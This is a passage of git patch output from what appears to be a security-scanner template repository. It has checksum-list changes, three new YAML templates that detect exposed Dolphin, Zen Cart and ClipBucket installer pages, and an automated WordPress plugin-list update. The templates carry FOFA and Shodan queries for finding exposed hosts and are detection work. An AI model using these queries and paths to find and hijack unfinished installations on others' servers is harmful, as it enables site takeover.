-network/detection/pop3-detect.yaml:4dfb3a5e10ac41f9d08912ce25e5895512f348a2
-network/detection/proftpd-server-detect.yaml:f8e31581df48389c3cdadcd7a1ed6d35adbe2099
-network/detection/rabbitmq-detect.yaml:69219a94f9425ecf96ee9e9678711cfcbd87b797
-network/detection/rdp-detect.yaml:86666e40065620d31395570f8d80e6adbe4dde3e
-network/detection/redis-detect.yaml:7ef522d24e9e0914ff5367bc5fa42d1b46323fa4
-network/detection/riak-detect.yaml:547e4a1204dc2fde23d40e1bc162ab2a161bebc0
-network/detection/rpcbind-portmapper-detect.yaml:e81701b944f44e94cbe6f82e2c3ba4f71c3cb28c
-network/detection/rsyncd-service-detect.yaml:007ce06c7619746977e4d4aacdb505397ff54376
-network/detection/rtsp-detect.yaml:41b325b0bedc536f795d5b108eab0809b5fb7645
-network/detection/samba-detect.yaml:1d01568e7fc2462ce96c515723afe281f5894171
-network/detection/sap-router.yaml:4f748f58cf50d3a389217e892eb7d8c9eed4c064
-network/detection/smb-detect.yaml:b0c061673b26b5a60fa6f2e0eb20de37c08ba66b
-network/detection/smtp-detect.yaml:4cb698e3aef0566a80be0f15ad73d05d98dcc2f5
-network/detection/sshd-dropbear-detect.yaml:dc663f0b684b4c5a0443171ac324a65e88a91353
-network/detection/starttls-mail-detect.yaml:76b6099c08373bc8c49dc0bf4a67ee8598c7811b
-network/detection/teamspeak3-detect.yaml:db3d1ee5ab40f3d460f4463329ab757152df6aa1
-network/detection/telnet-detect.yaml:8fbcde5667ca617d7e35844cc4573fc806470eb6
-network/detection/totemomail-smtp-detect.yaml:67399b872a46c4042a6d7cc2242fbda598fe80e1
-network/detection/vmware-authentication-daemon-detect.yaml:c3200055ad0072a42b7c7e67374d348f236b2ded
-network/detection/vnc-service-detect.yaml:fe0054cc1b77b69404d2f446676403f252b82b98
+network/detection/microsoft-ftp-service.yaml:6f708d434317cab50e22dcbf0cf0a7c6b1f50024
+network/detection/mikrotik-ftp-server-detect.yaml:982b5291acbcd77edacf48e89d3994b318a037f7
+network/detection/mikrotik-routeros-api.yaml:7d1701054a8eca6e0219daade906f62199bae7be
+network/detection/mongodb-detect.yaml:14a7061cb316789e1ed2966eabee3a73cdeb3095
+network/detection/msmq-detect.yaml:2e010e5361bd3a378acb206deb3f88dcace0f86a
+network/detection/mysql-detect.yaml:16622dce5061bdffc1b06f94774d218b1273e064
+network/detection/openssh-detect.yaml:b3e1412979d8c988b89d0cbc1187844a0822d206
+network/detection/pgsql-detect.yaml:708a0b3eae3016a606b6ff007f1de11a67258ba5
+network/detection/pop3-detect.yaml:3e311c4a8c64d82ca51059ce7ec279b4007976d6
+network/detection/proftpd-server-detect.yaml:fd531f5766d93745a59283f088ee2ec6912c123e
+network/detection/rabbitmq-detect.yaml:6371c7c2422e1fd476588c0bbfc9511314b651b2
+network/detection/rdp-detect.yaml:c4c7456edb709c4742a0e9e4cfe35e54e11290b1
+network/detection/redis-detect.yaml:1dfbeabe00130bce370dc31992469adb53d99cb9
+network/detection/riak-detect.yaml:0bcd26c326dbdc744fbb155a6e8f12c2ff156a8a
+network/detection/rpcbind-portmapper-detect.yaml:82a89b2d869fab4d218f454b53027fb16c1bee56
+network/detection/rsyncd-service-detect.yaml:f0905cbabc4fa3c1835ea42a202f8f94153deb33
+network/detection/rtsp-detect.yaml:947398884786d4c6f9298d0812b09aeca06166e4
+network/detection/samba-detect.yaml:30c17f96b15e20d365447618d985a89ad69a2fda
+network/detection/sap-router.yaml:8859ee9e397ee277d1a3d02d66501b512af2c4e6
+network/detection/smb-detect.yaml:85bb2ef0b2f750f18d13b550f29d5f7a42d9e1a5
+network/detection/smtp-detect.yaml:8fdad71840fe86f87f078d55e3c03cdf0ead617b
+network/detection/sshd-dropbear-detect.yaml:156391be9a6b7a1c6afbbbeb9f2efed1605ba102
+network/detection/starttls-mail-detect.yaml:5f0ae8b226a2346484d8a8ac4d4c5ae539f7b236
+network/detection/teamspeak3-detect.yaml:3e76695a26b773a2974415ca2d86aa07547ad29a
+network/detection/telnet-detect.yaml:fe1a76b09c7ab8dc16ec56bf287ad790cf09b40b
+network/detection/totemomail-smtp-detect.yaml:0e2622df4368a6bc7c56e5f1b533954d34e59505
+network/detection/vmware-authentication-daemon-detect.yaml:504e35ba7ab39cd1fa0f426fc91afcc07e0fe546
+network/detection/vnc-service-detect.yaml:a42e2c93779cbac0205589ca8e95d3bd82ad742b
 network/detection/weblogic-iiop-detect.yaml:94b8c1aaec6ffabca45c86cfb25b3a609e30bdfe
 network/detection/weblogic-t3-detect.yaml:ce204c445556d0e1e07af1f6aaa65ee9c817d252
-network/detection/xlight-ftp-service-detect.yaml:df09822d9cc6fa1b1e4f7f99bbacfc9c24160159
+network/detection/xlight-ftp-service-detect.yaml:bc7356eb6a29677333feb95946d55a03aa9a636b
 network/enumeration/beanstalk-service.yaml:6b761f32a18de725b06376576ad12d85a4ebf832
 network/enumeration/kafka-topics-list.yaml:c90f512f4ec006edc4c6986c0728015fa8525358
-network/enumeration/mongodb-info-enum.yaml:b77a072348b1dacf4f8d530063fd1e5f47cfea3a
-network/enumeration/niagara-fox-info-enum.yaml:cd3fc20375db89c116c2c5dcb82e970c0ab3a73e
-network/enumeration/psql-user-enum.yaml:c4c232dd301986d3c29e04e06748f57438fb1e0e
-network/enumeration/smtp/smtp-user-enum.yaml:1d4749091fccd1b9fa25ee8b09f34c3b51592152
-network/enumeration/smtp-commands-enum.yaml:e28d80b6ecb2e283d43f58f74e3d1ba6c63455fb
-network/exposures/cisco-smi-exposure.yaml:c760fcd32e21fc17283ed9a02c09a571a3680f29
-network/exposures/exposed-adb.yaml:52627ae57853ac9a610d3e789905bd2c557d9de4
-network/exposures/exposed-dockerd.yaml:a690f5be8036ac62769b004e1354f6638fcaa87b
-network/exposures/exposed-redis.yaml:3887effd170b1f500a92bd2725b325d4d6b3ce05
-network/exposures/exposed-zookeeper.yaml:1b4fc1c2c6a2131c33a293a4655c4e0d3f4fe6b0
+network/enumeration/mongodb-info-enum.yaml:e76172b1956b7825ca970c8616b5d6d6bd3bdf35
+network/enumeration/niagara-fox-info-enum.yaml:c0f4960a01fdcaf5d8fe9a62338db8c1722710d4
+network/enumeration/psql-user-enum.yaml:c37a2285d957cca03918b3bac57938591ff43eb1
+network/enumeration/smtp/smtp-user-enum.yaml:f30e5dc7caac293452642d3bcab76f394b90fbd6
+network/enumeration/smtp-commands-enum.yaml:d1aaf41b7529f2299427f41563fb8b9ffae66dc6
+network/exposures/cisco-smi-exposure.yaml:0e5c3ef674f9b5f167d96082062ea2249466b398
+network/exposures/exposed-adb.yaml:9594b49babf1af5e4cab3188213b549a64265efb
+network/exposures/exposed-dockerd.yaml:1417226a4f40fe0066046b2597650c2a33dcbf38
+network/exposures/exposed-redis.yaml:cb745be2fecf35c476802e5b79470f60c71a5ae4
+network/exposures/exposed-zookeeper.yaml:caadec7e7c5d53f68b659abf63b0803f89844137
 network/jarm/c2/cobalt-strike-c2-jarm.yaml:7bf85725d77f35262ff24b7678adc4461404b92e
 network/jarm/c2/covenant-c2-jarm.yaml:71fe7c9b7f6f7fbef263204bf701a6a5a513eb1f
 network/jarm/c2/deimos-c2-jarm.yaml:bcbf9501f84caefd8c9385a3575a3fb6c2fd4ce2
@@ -7153,22 +7154,22 @@ network/jarm/c2/posh-c2-jarm.yaml:06aa7bbb8f3cd637fde301b7eac9c83b68467f0c
 network/jarm/c2/shad0w-c2-jarm.yaml:21d654db72d9fbefa32a7ec40d4a77616aa4a43a
 network/jarm/c2/silenttrinity-c2-jarm.yaml:fdec712cc69eed900b0d7ba42187a0ea0e7bb95b
 network/jarm/c2/sliver-c2-jarm.yaml:dd41a2f23026cb1ce6fab8fb12f3e4a82a2accc3
-network/misconfig/apache-dubbo-unauth.yaml:9fc2673de80d24caa065664242dfbd2eb1392eb4
-network/misconfig/apache-rocketmq-broker-unauth.yaml:aec4738a8ac3af859878ab933b173856d6c2be54
-network/misconfig/clamav-unauth.yaml:20adfce3848329dbb83e8f18a1e17ad8767f8ab8
-network/misconfig/clickhouse-unauth.yaml:4d0e9f50cdf7d2241db5ee84b8ccb207a46230c8
-network/misconfig/dropbear-weakalgo.yaml:27cdaa70b7fe79843b983b161e1fad88288a373b
-network/misconfig/dropbear-weakmac.yaml:760914a845a37654688bae793af4a4201c389482
-network/misconfig/ganglia-xml-grid-monitor.yaml:fc9b7c0872ffc3a33b0f680e53c0e1f74fb15544
-network/misconfig/memcached-stats.yaml:29b5e7465487bcd2328367ddc9c57ae4b30abafc
-network/misconfig/mongodb-unauth.yaml:1f53455484d54404a99989dd24d6c625018db29d
-network/misconfig/mysql-native-password.yaml:dc73cd03694628961e4c23e897004316f93d0437
+network/misconfig/apache-dubbo-unauth.yaml:fa64cdcdd200e3903740270c20f2f496b166326e
+network/misconfig/apache-rocketmq-broker-unauth.yaml:a0b4d5a3542cd566dca41e2c81a36946f37f082d
+network/misconfig/clamav-unauth.yaml:4b7d93ad668cc7379e2b7fff647f78a556d33b2e
+network/misconfig/clickhouse-unauth.yaml:1a73fd74d84c42d566444d121ac39b46cd1e8c94
+network/misconfig/dropbear-weakalgo.yaml:3a891c5a4c40abbf6a7bc5bb889e4bc73b20fcd1
+network/misconfig/dropbear-weakmac.yaml:3a43654448a9ed8f21879b5c0d3b0e20149c7186
+network/misconfig/ganglia-xml-grid-monitor.yaml:77974337ca2086bdaaf04aae2feb7b882999c30d
+network/misconfig/memcached-stats.yaml:a37da681d1790e3439afe2ac2a87c849183ff91a
+network/misconfig/mongodb-unauth.yaml:725f2ad0e9e8b345ef9b91fd145a4233ceea03ef
+network/misconfig/mysql-native-password.yaml:14aefc5bb2427a4e20fc97add001e8bfbe2709b1
 network/misconfig/printers-info-leak.yaml:e2db9eb3ecff671c0c3f68f0d150e4970895c0ed
-network/misconfig/sap-router-info-leak.yaml:ad7ae897ff318aa35b5191b6950022c9b17013ee
-network/misconfig/tidb-native-password.yaml:5a201045c715852806eb2f11c2d7320f428fd104
-network/misconfig/tidb-unauth.yaml:a2ae3b64fb37d676ab8343b68c77f98c0855997b
-network/misconfig/unauth-psql.yaml:eed9adc5419a909329f6f49eca32a1a1455963ee
-network/vulnerabilities/clockwatch-enterprise-rce.yaml:eb8bd907db57a3f2c47999d0bc026d17550f4e0c
+network/misconfig/sap-router-info-leak.yaml:2f48f49855087805c5ddd1a3449f26ad1170fc31
+network/misconfig/tidb-native-password.yaml:bcb9cba3c478d26850c248966c48d6f61ebd8e49
+network/misconfig/tidb-unauth.yaml:cd37710d3d9b6d9cb77ff5e36b8932cbb7c97b7a
+network/misconfig/unauth-psql.yaml:3fd71dfb46ec0b55a9d90bb997528ccbdceb6937
+network/vulnerabilities/clockwatch-enterprise-rce.yaml:a8083f4c2e1456d927929df2a195012a65a25b20
 ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55
 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a
 ssl/c2/cobalt-strike-c2.yaml:fa3905fc13397006d2bdba8729cf4879f3ecf541
@@ -7195,7 +7196,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:3fa9d3f4155f376df13f89495d8c7b190ad97a68
+templates-checksum.txt:4ab8febf89a2dc55e45b5f4bf1f21a2c062e5bf9
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 8346d97b22054a13ac1ec8af37e0f97256ffa766 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Thu, 28 Sep 2023 07:20:48 +0530
Subject: [PATCH 0572/1090] Create dolphin-installer.yaml

---
 .../installer/dolphin-installer.yaml          | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/misconfiguration/installer/dolphin-installer.yaml

diff --git a/http/misconfiguration/installer/dolphin-installer.yaml b/http/misconfiguration/installer/dolphin-installer.yaml
new file mode 100644
index 0000000000..2320abfd38
--- /dev/null
+++ b/http/misconfiguration/installer/dolphin-installer.yaml
@@ -0,0 +1,32 @@
+id: dolphin-installer
+
+info:
+  name: Dolphin Installer
+  author: DhiyaneshDk
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: icon_hash="-945121295"
+  tags: misconfig,dolphin,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/install.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Dolphin Installation'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200

From 4050afbbc96bb2cc58948e36470693ee5349f84a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Thu, 28 Sep 2023 07:47:47 +0530
Subject: [PATCH 0573/1090] Create zencart-installer.yaml

---
 .../installer/zencart-installer.yaml          | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 http/misconfiguration/installer/zencart-installer.yaml

diff --git a/http/misconfiguration/installer/zencart-installer.yaml b/http/misconfiguration/installer/zencart-installer.yaml
new file mode 100644
index 0000000000..a6ae697c00
--- /dev/null
+++ b/http/misconfiguration/installer/zencart-installer.yaml
@@ -0,0 +1,28 @@
+id: zencart-installer
+
+info:
+  name: Zen Cart Installer
+  author: DhiyaneshDk
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="Installer" && icon_hash="899320116"
+    shodan-query: html:"shopping cart program by zen cart"
+  tags: misconfig,zencart,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/zc_install/index.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Zen Cart® Installer'
+
+      - type: status
+        status:
+          - 200

From cb632e613ff89eacc8b234d29266e77f670bc488 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Thu, 28 Sep 2023 08:00:05 +0530
Subject: [PATCH 0574/1090] Create clipbucket-installer.yaml

---
 .../installer/clipbucket-installer.yaml       | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 http/misconfiguration/installer/clipbucket-installer.yaml

diff --git a/http/misconfiguration/installer/clipbucket-installer.yaml b/http/misconfiguration/installer/clipbucket-installer.yaml
new file mode 100644
index 0000000000..bd46615478
--- /dev/null
+++ b/http/misconfiguration/installer/clipbucket-installer.yaml
@@ -0,0 +1,28 @@
+id: clipbucket-installer
+
+info:
+  name: ClipBucket Installer
+  author: DhiyaneshDk
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: icon_hash="538583492"
+    shodan-query: http.favicon.hash:538583492
+  tags: misconfig,clipbucket,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cb_install/'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'ClipBucket ([a-z0-9.]+) STABLE Installer'
+
+      - type: status
+        status:
+          - 200

From fc00af69a0830c47d4c7af93c8bc820590e376a4 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 04:02:23 +0000
Subject: [PATCH 0575/1090] Auto WordPress Plugins Update [Thu Sep 28 04:02:23
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/gutenberg.txt                         | 2 +-
 helpers/wordpress/plugins/jetpack.txt                           | 2 +-
 helpers/wordpress/plugins/mailpoet.txt                          | 2 +-
 helpers/wordpress/plugins/ml-slider.txt                         | 2 +-
 helpers/wordpress/plugins/nextgen-gallery.txt                   | 2 +-
 helpers/wordpress/plugins/premium-addons-for-elementor.txt      | 2 +-
 helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt     | 2 +-
 helpers/wordpress/plugins/w3-total-cache.txt                    | 2 +-
 helpers/wordpress/plugins/webp-converter-for-media.txt          | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 209 files changed, 9 insertions(+), 209 deletions(-)

